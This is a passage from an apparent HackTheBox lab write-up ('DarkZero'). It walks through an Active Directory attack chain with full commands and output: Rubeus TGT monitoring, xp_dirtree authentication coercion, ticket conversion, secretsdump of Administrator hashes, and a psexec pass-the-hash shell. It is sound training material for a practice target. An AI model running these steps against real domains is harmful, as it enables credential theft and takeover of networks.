Since we have an administrator user on DC02, we should be able to start Rubeus.exe in monitor mode, this will allow us to capture any authentication made towards the machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\w1ld> .\Rubeus.exe monitor /interval:5 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
<SNIP>
Next let’s use impacket-mssqlclient.py to enter into an mssql session on DC01.darkzero.htb.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ mssqlclient.py $D/$USER:$PASS@dc01.darkzero.htb -windows-auth
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
Note that here I’m using
windows_authto use the domain authentication rather than the mssql accounts.
Lastly let’s do an xp_dirtree to coerce DC01.darkzero.htb to authenticate to DC02.darkzero.ext
1
2
3
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\w1ld\pwned
subdirectory depth file
------------ ----- ----
Now going back to our Rubeus session we can see that we’ve captured another TGT!
1
2
3
4
5
6
7
8
9
10
[*] 10/6/2025 11:33:58 PM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/6/2025 4:33:56 PM
EndTime : 10/7/2025 2:33:55 AM
RenewTill : 10/13/2025 4:33:55 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAg<SNIP>
Let’s transfer this base64 encoded ticket into our attacker machine.
1
echo -n 'doIFjDCCBYigA[REDACTED]' > dc01.b64
Next let’s convert this ticket into a kirbi file.
1
base64 -d dc01.b64 > dc01.kirbi
Lastly let’s use impacket-ticketconverter.py to convert this kirbi file to a ccache we can use to authenticate
1
2
3
4
5
6
7
$ ticketConverter.py dc01.kirbi dc01.ccache
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
Let’s now use this ccache in our KRB5CCNAME environment variable and attempt to authenticate to the domain.
1
2
3
4
5
6
7
8
9
10
$ export KRB5CCNAME=/home/kali/htb/DarkZero/dc01.ccache
$ bloodyAD -d darkzero.htb --host dc01.darkzero.htb -k get writable
distinguishedName: CN=Keys,DC=darkzero,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
permission: WRITE
Success! looks like we have valid authentication on the DC! let’s dump some secrets.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ secretsdump.py 'darkzero.htb/DC01$@dc01.DARKZERO.htb' -k -no-pass -just-dc-user Administrator
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or p
in to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
[*] Kerberos keys grabbed
Administrator:0x14:[REDACTED]
Administrator:0x13:[REDACTED]
Administrator:aes256-cts-hmac-sha1-96:[REDACTED]
Administrator:aes128-cts-hmac-sha1-96:[REDACTED]
Administrator:0x17:[REDACTED]
[*] Cleaning up...
Now that we’ve grabbed a hash let’s grab a shell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ psexec.py "$D/$USER@$DC" -hashes ":$HASH"
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.darkzero.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WgBleoMq.exe
[*] Opening SVCManager on dc01.darkzero.htb.....
[*] Creating service cyOA on dc01.darkzero.htb.....
[*] Starting service cyOA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.4652]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EF7E-D912
Directory of C:\Users\Administrator\Desktop
07/31/2025 03:21 PM <DIR> .
03/23/2025 08:38 PM <DIR> ..
10/06/2025 03:31 PM 34 root.txt
10/06/2025 03:31 PM 34 user.txt
2 File(s) 68 bytes
2 Dir(s) 6,333,386,752 bytes free
Just like that, we have Root!
tags: boxes - diff/hard - os/windows